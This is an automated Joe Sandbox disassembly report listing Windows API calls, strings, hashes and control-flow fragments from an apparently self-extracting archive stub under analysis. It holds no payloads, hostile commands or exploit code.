                                                                                              • String ID: .exe$.inf
                                                                                              • API String ID: 36480843-3750412487
                                                                                              • Opcode ID: c47b8dcf54fc1a16f3028ab6d6364f3ad7111c977cb84311a936115c4bf3b5be
                                                                                              • Instruction ID: de231151d2098269ee19c3552789dd4b7849f569190ee5e6e3fe0afeb951738c
                                                                                              • Opcode Fuzzy Hash: c47b8dcf54fc1a16f3028ab6d6364f3ad7111c977cb84311a936115c4bf3b5be
                                                                                              • Instruction Fuzzy Hash: 9B51E5708043809ADB309F64A844BFB7BE4AF46744F04041EF5D6972A1FB728F85DB52

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00CC5695,00CC5695,?,?,?,00CCABAC,00000001,00000001,2DE85006), ref: 00CCA9B5
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00CCABAC,00000001,00000001,2DE85006,?,?,?), ref: 00CCAA3B
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00CCAB35
                                                                                              • __freea.LIBCMT ref: 00CCAB42
                                                                                                • Part of subcall function 00CC8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CCCA2C,00000000,?,00CC6CBE,?,00000008,?,00CC91E0,?,?,?), ref: 00CC8E38
                                                                                              • __freea.LIBCMT ref: 00CCAB4B
                                                                                              • __freea.LIBCMT ref: 00CCAB70
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1414292761-0
                                                                                              • Opcode ID: a48d944ffa07c1d133ca6b992d5c381d3e60db4252c7c2742f93e03d621276fd
                                                                                              • Instruction ID: 09d8fee3208e3345e85151fd557d9c8c17fb98e3b4330ff46c023a6a1ed9bd4e
                                                                                              • Opcode Fuzzy Hash: a48d944ffa07c1d133ca6b992d5c381d3e60db4252c7c2742f93e03d621276fd
                                                                                              • Instruction Fuzzy Hash: DB51F272A0021AAFDB258F64CC59FBFB7AAEB40718F15462DFC14D6140EB30DD40E692

                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00CC3C35,?,?,00D02088,00000000,?,00CC3D60,00000004,InitializeCriticalSectionEx,00CD6394,InitializeCriticalSectionEx,00000000), ref: 00CC3C03
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID: api-ms-
                                                                                              • API String ID: 3664257935-2084034818
                                                                                              • Opcode ID: 9f14fe4840e663526013d88c6bbf18997dff20a87762c9e2ea6b5985fdb17175
                                                                                              • Instruction ID: 52baca03c0c62913af53c952ce1905f0eb71615f8be309e607c3a8d44b487bde
                                                                                              • Opcode Fuzzy Hash: 9f14fe4840e663526013d88c6bbf18997dff20a87762c9e2ea6b5985fdb17175
                                                                                              • Instruction Fuzzy Hash: 38110635A052A1ABCB228B6CEC55F5D37649F05770F214225F925FB2D0E770EF008AD1

                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00CA7760,?,00000005,?,00000011), ref: 00CA995F
                                                                                              • GetLastError.KERNEL32(?,?,00CA7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CA996C
                                                                                              • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00CA7760,?,00000005,?), ref: 00CA99A2
                                                                                              • GetLastError.KERNEL32(?,?,00CA7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CA99AA
                                                                                              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00CA7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CA99F9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CreateErrorLast$Time
                                                                                              • String ID:
                                                                                              • API String ID: 1999340476-0
                                                                                              • Opcode ID: 071dc1233f5bacbab56b7f8b50ac12f6649e342c72fc678fe1b3119df82c96bd
                                                                                              • Instruction ID: a3b218c756548c5e7ec44cf139d3596cc0db730fc16133e03ca362589a30111a
                                                                                              • Opcode Fuzzy Hash: 071dc1233f5bacbab56b7f8b50ac12f6649e342c72fc678fe1b3119df82c96bd
                                                                                              • Instruction Fuzzy Hash: 0C3115305443867FE7209B34CC46BDBBB98FB06328F100B19F9B5961D1D7B5AA44CB95

                                                                                              APIs
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CBB579
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBB58A
                                                                                              • IsDialogMessageW.USER32(0001046E,?), ref: 00CBB59E
                                                                                              • TranslateMessage.USER32(?), ref: 00CBB5AC
                                                                                              • DispatchMessageW.USER32(?), ref: 00CBB5B6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 1266772231-0
                                                                                              • Opcode ID: e3ecf8d4c8e05dae66c7302f54da6ee22830ddd65d8600e134fdcf40729098a9
                                                                                              • Instruction ID: 8af23210dca3a17d852ca747d23db509c157c7b28cf8cdaf25952a7b43684812
                                                                                              • Opcode Fuzzy Hash: e3ecf8d4c8e05dae66c7302f54da6ee22830ddd65d8600e134fdcf40729098a9
                                                                                              • Instruction Fuzzy Hash: CDF06D71E0221AABDB209FE6AC4CEDB7FACEE056917404415B519D2150EB74D609CBB1

                                                                                              APIs
                                                                                              • GetClassNameW.USER32(?,?,00000050), ref: 00CBABC2
                                                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 00CBABF9
                                                                                                • Part of subcall function 00CB1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CAC116,00000000,.exe,?,?,00000800,?,?,?,00CB8E3C), ref: 00CB1FD1
                                                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00CBABE9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                              • String ID: EDIT
                                                                                              • API String ID: 4243998846-3080729518

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00CB081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CB0836
                                                                                                • Part of subcall function 00CB081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CAF2D8,Crypt32.dll,00000000,00CAF35C,?,?,00CAF33E,?,?,?), ref: 00CB0858
                                                                                              • OleInitialize.OLE32(00000000), ref: 00CBAC2F
                                                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CBAC66
                                                                                              • SHGetMalloc.SHELL32(00CE8438), ref: 00CBAC70
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                              • String ID: riched20.dll
                                                                                              • API String ID: 3498096277-3360196438

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 1070 cbdbde-cbdc09 call cbec50 SetEnvironmentVariableW call cb0371 1074 cbdc0e-cbdc12 1070->1074 1075 cbdc36-cbdc38 1074->1075 1076 cbdc14-cbdc18 1074->1076 1077 cbdc21-cbdc28 call cb048d 1076->1077 1080 cbdc1a-cbdc20 1077->1080 1081 cbdc2a-cbdc30 SetEnvironmentVariableW 1077->1081 1080->1077 1081->1075
                                                                                              APIs
                                                                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00CBDBF4
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CBDC30
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentVariable
                                                                                              • String ID: sfxcmd$sfxpar
                                                                                              • API String ID: 1431749950-3493335439

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 1082 ca9785-ca9791 1083 ca979e-ca97b5 ReadFile 1082->1083 1084 ca9793-ca979b GetStdHandle 1082->1084 1085 ca9811 1083->1085 1086 ca97b7-ca97c0 call ca98bc 1083->1086 1084->1083 1087 ca9814-ca9817 1085->1087 1090 ca97d9-ca97dd 1086->1090 1091 ca97c2-ca97ca 1086->1091 1093 ca97ee-ca97f2 1090->1093 1094 ca97df-ca97e8 GetLastError 1090->1094 1091->1090 1092 ca97cc 1091->1092 1095 ca97cd-ca97d7 call ca9785 1092->1095 1097 ca980c-ca980f 1093->1097 1098 ca97f4-ca97fc 1093->1098 1094->1093 1096 ca97ea-ca97ec 1094->1096 1095->1087 1096->1087 1097->1087 1098->1097 1100 ca97fe-ca9807 GetLastError 1098->1100 1100->1097 1102 ca9809-ca980a 1100->1102 1102->1095
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00CA9795
                                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00CA97AD
                                                                                              • GetLastError.KERNEL32 ref: 00CA97DF
                                                                                              • GetLastError.KERNEL32 ref: 00CA97FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$FileHandleRead
                                                                                              • String ID:
                                                                                              • API String ID: 2244327787-0
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00CC3F73,00000000,00000000,?,00CCACDB,00CC3F73,00000000,00000000,00000000,?,00CCAED8,00000006,FlsSetValue), ref: 00CCAD66
                                                                                              • GetLastError.KERNEL32(?,00CCACDB,00CC3F73,00000000,00000000,00000000,?,00CCAED8,00000006,FlsSetValue,00CD7970,FlsSetValue,00000000,00000364,?,00CC98B7), ref: 00CCAD72
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00CCACDB,00CC3F73,00000000,00000000,00000000,?,00CCAED8,00000006,FlsSetValue,00CD7970,FlsSetValue,00000000), ref: 00CCAD80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 3177248105-0
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00CAD343,00000001,?,?,?,00000000,00CB551D,?,?,?), ref: 00CA9F9E
                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00CB551D,?,?,?,?,?,00CB4FC7,?), ref: 00CA9FE5
                                                                                              • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00CAD343,00000001,?,?), ref: 00CAA011
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite$Handle
                                                                                              • String ID:
                                                                                              • API String ID: 4209713984-0
                                                                                              APIs
                                                                                                • Part of subcall function 00CAC27E: _wcslen.LIBCMT ref: 00CAC284
                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA2D9
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA30C
                                                                                              • GetLastError.KERNEL32(?,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA329
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2260680371-0
                                                                                              APIs
                                                                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00CCB8B8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Info
                                                                                              • String ID:
                                                                                              • API String ID: 1807457897-3916222277
                                                                                              APIs
                                                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00CCAFDD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: String
                                                                                              • String ID: LCMapStringEx
                                                                                              • API String ID: 2568140703-3893581201
                                                                                              • Opcode ID: 4a747d107bb871ad10b3f0602ae1c44bbc20e20a3cd43ee765bcfd7ee2a54a44
                                                                                              • Instruction ID: dac727fe3992756c7fb12c2f1f32220721f276d8c0dcd5f4cb405abc965d7bab
                                                                                              • Opcode Fuzzy Hash: 4a747d107bb871ad10b3f0602ae1c44bbc20e20a3cd43ee765bcfd7ee2a54a44
                                                                                              • Instruction Fuzzy Hash: 3B014C3250510DBBCF026F90DC05EEE7F62EF08754F01425AFE1466261C6728A31EB81
                                                                                              APIs
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00CCA56F), ref: 00CCAF55
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountCriticalInitializeSectionSpin
                                                                                              • String ID: InitializeCriticalSectionEx
                                                                                              • API String ID: 2593887523-3084827643
                                                                                              • Opcode ID: 61a3599f8fdadf73d6b75d71f4d6a42423ec63176d957921e5bc7d3d12dd1385
                                                                                              • Instruction ID: f8f0538449bb044e5f4bd483c9df1f43f6fcd7557c4b64606765a2899ec05608
                                                                                              • Opcode Fuzzy Hash: 61a3599f8fdadf73d6b75d71f4d6a42423ec63176d957921e5bc7d3d12dd1385
                                                                                              • Instruction Fuzzy Hash: F5F0B43264621CBFCF026F50CC1AE9D7F61EF04711F40416AFD099A360EA314A10A786
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Alloc
                                                                                              • String ID: FlsAlloc
                                                                                              • API String ID: 2773662609-671089009
                                                                                              • Opcode ID: 0ad728546c387cf2d2426a2c060b3c3789e2867b08a2f9528dd9be7f654fc6d3
                                                                                              • Instruction ID: 94ae5c6869b4db779ccb4566efea84c08086f339538c5e3cf6aeebcfa5f1bac9
                                                                                              • Opcode Fuzzy Hash: 0ad728546c387cf2d2426a2c060b3c3789e2867b08a2f9528dd9be7f654fc6d3
                                                                                              • Instruction Fuzzy Hash: 91E0E532A8621C7BC601AB65DC1AF6EBB94DB04721B4102AEF90697340DD715E1196DA
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBEAF9
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: 3Ro
